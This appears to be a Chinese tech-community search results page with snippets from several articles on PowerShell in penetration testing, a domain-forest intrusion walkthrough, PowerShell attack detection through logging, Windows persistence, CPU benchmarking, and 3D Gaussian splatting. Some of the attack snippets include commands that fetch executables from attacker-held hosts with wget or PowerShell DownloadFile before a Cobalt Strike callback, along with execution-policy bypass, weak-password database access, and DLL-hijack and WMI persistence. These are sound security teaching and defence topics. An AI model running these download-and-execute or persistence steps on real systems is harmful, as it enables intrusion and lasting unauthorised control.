首页
学习
活动
专区
圈层
工具
发布
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    浅谈PowerShell在渗透测试中的应用

    它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。...Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...0x02 常用命令及一般攻击方式 -WindowsStyle Hidden 隐藏自己的窗口 -ExecutionPolicy Bypass 绕过策略 Get-Content .runme.ps1 | PowerShell.exe...PowerShell Invoke-WebRequest (wget): wget "http://10.0.0.10/nc.exe" -outfile "nc.exe" 获取帮助 get-help 进程相关 start-process...看了很多国外的内网渗透权限维持和免杀后,发现powershell做对抗的难度已提升了 国外大牛们已经开始在研究.net以及C#的代码,进行绕过和长久控制 感兴趣的可以多研究下C#和.net编程哦,未来一段时间里的发展方向

    3K20

    实战渗透域森林+服务森林

    = 1097 公网服务器frps.ini配置如下 [common] bind_addr = 0.0.0.0 bind_port = 13000 (二)命令执行 首先先开启服务端的frp,在web服务器和公网服务器下执行如下命令...http://20.20.20.199 proxychains firefox http://20.20.20.199/phpmyadmin 但是加载太慢了,它的默认口令为root/root,利用方法和之前一样...xxx msf > exploit 得到弱口令root/root,直接登录 proxychains mysql -u root -proot -h20.20.20.199 查看是否拥有写入文件的权限和写入位置...mac5.exe powershell.exe (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe...---255663886332559909593529682920-- 执行后,成功上线CS 0x15 攻击WebSphere独立机 一、信息收集 通过railgun工具扫描端口信息,发现9060和9043

    1.6K20

    Intel Xeon 8269CY比8255C主频占优,但优势绝不是表面上的0.1GHz

    Intel Xeon 8269CY 、8255C这两款CPU差异很大 虽然睿频范围很接近(前者2.5~3.2,后者2.5~3.1),但实际跑的时候前者相对稳定,后者根据测试用例和测试软件不同,在睿频范围内浮动较大...products/specifications/processors.html 下面我们详细看下测试数据: 阿里云有很多Intel 8269CY(2.5GHz基频,全核睿频3.2GHz)机型,包括普通云服器和裸金属...腾讯云 高IO型BMI5 BMI5.24XLARGE384(96核) 我有个Server2022+3dsmax2022的测试用例,在腾讯云、阿里云都能直接用(从腾讯云在线迁移到阿里云的,普通云服务器和裸金属都能用...new-object System.Net.WebClient $client1.DownloadFile('下载链接','c:\vray-benchmark-6.00.02-cli.exe') Start-Process...6.00.02-cli.exe -m vray 2>&1 1>c:\log.txt" 还有一个更简单的办法压测单核,用psexec64 -accepteula -nobanner -i -s -a 3 powershell.exe

    1.5K10

    如何利用日志来监控和限制PowerShell攻击活动

    这种方法主要利用的是Windows的事件日志,首先我们需要了解攻击者是如何使用PowerShell来实施攻击的,然后我们再来看一看相关的检测和防御机制。...下面给出的是真实场景中的攻击实例: 在这个样例中,攻击者使用了.downloadfile()方法来下载恶意文件,并使用环境变量将其存储在了用户的Appdata目录中,然后使用“Start-Process...你可以使用进程管理器等工具来查看父进程和子进程之间的关系,你可以从下图中看到,Explorer.exe是PowerShell.exe的父进程: 但是在大多数PowerShell攻击中,PowerShell...因此,在这种场景下,PowerShell.exe的父进程将会是cmd.exe: 所以说,我们可以通过观察PowerShell父进程和子进程之间的关系来作为我们的IoC。...首先,我们需要捕捉到PowerShell攻击互动,所以我们需要监控与PowerShell.exe进程创建相关的事件。

    2.9K50

    三维场景重建3D高斯点渲染复现

    相比传统的点云或网格模型,Gaussian-splatting能够在较低的内存占用下提供更加细腻和平滑的表面细节,特别适合于表现具有复杂几何结构和纹理变化的场景。...3D Gaussian-splatting结合了点云的灵活性和体素表示的紧凑性,同时提供了类似于NeRF的高质量渲染结果。...,还编码了颜色、法线和其他物理属性。...渲染过程 当渲染一个场景时,3D Gaussian-splatting通过以下步骤来合成图像: 投影:首先,根据相机的姿态(位置和朝向),将所有高斯分布投影到图像平面上。...优化与加速 为了使3D Gaussian-splatting能够高效运行,研究者们提出了一系列优化策略,包括但不限于: 层次结构:构建多层次的数据结构,如八叉树或kd-tree,以便快速查找和剔除远离视线的高斯分布

    1.3K10

    实时3D重建:Gaussian Splatting移动优化

    然而,这些方法在处理大规模场景时往往面临计算效率和内存占用的巨大挑战。最近,Gaussian Splatting作为一种新兴的3D表示方法,因其在效率和质量上的平衡而受到广泛关注。...与传统方法不同,Gaussian Splatting使用一组高斯分布来表示3D场景,每个高斯分布携带颜色、不透明度和空间位置信息。这种方法不仅能够高效渲染复杂场景,还能自然地处理透明物体和动态变化。...在移动设备上实现高效的Gaussian Splatting具有重要意义。想象一下,使用智能手机或平板电脑,用户可以实时捕获和重建周围环境的3D模型,并在增强现实中与之交互。...Neural Scene Representation》论文详细介绍了Gaussian Splatting的基本原理和实现细节,为后续的移动优化提供了理论基础。...总结移动优化总结通过对Gaussian Splatting的算法、数据表示和GPU利用进行系统优化,我们成功实现了在移动设备上的高效3D重建。

    67010

    GauHuman开源:基于Gaussian Splatting,高质量3D人体快速重建和实时渲染框架

    机器之心专栏 机器之心编辑部 南洋理工大学 - 商汤科技联合研究中心 S-Lab 团队提出了基于 Gaussian Splatting 的高质量 3D 人体快速重建 (1~2 分钟) 和实时渲染 (高达...得益于 Gaussian Splatting 在静态和动态场景中的实时渲染特性,本方法针对单目人体视频提出基于 Gaussian Splatting 的快速训练(1~2 分钟)和实时渲染(高达 189...针对建模过程中出现的 over-reconstruction 和 under-reconstruction 现象,Gaussian Splatting 论文提出分裂(split)和克隆(clone)的操作来动态控制...这极大降低了在训练和渲染中的计算资源耗费。【高效优化 articulated Gaussian Splatting】1)3D 高斯球初始化。...结语 本文提出一种基于 Gaussian Splatting 的高质量 3D 人体快速重建 (1~2 分钟) 和实时渲染 (高达 189 帧每秒) 框架 GauHuman。

    1.2K10

    windows权限维持(二)

    Server 2000 Windows Server 2012 Windows Server 2003 with SP1 Windows 8 Windows 10 首先新建一个powershell文件内容为: start-process...msdtc加载后门 msdtc.exe 存在于组环境和域环境中,是微软的一个分布式事物处理协调器服务。要求处于工作组或者域环境内。 ?...因为他在启动时会默认加载oci.dll,SQLLib80.dll和xa80.dll。Windows系统默认不包含oci.dll。...wmi执行后门技术 WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。...WMI在渗透测试中的价值在于它不需要下载和安装, 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生,不会留下任何痕迹。

    1.9K20
    领券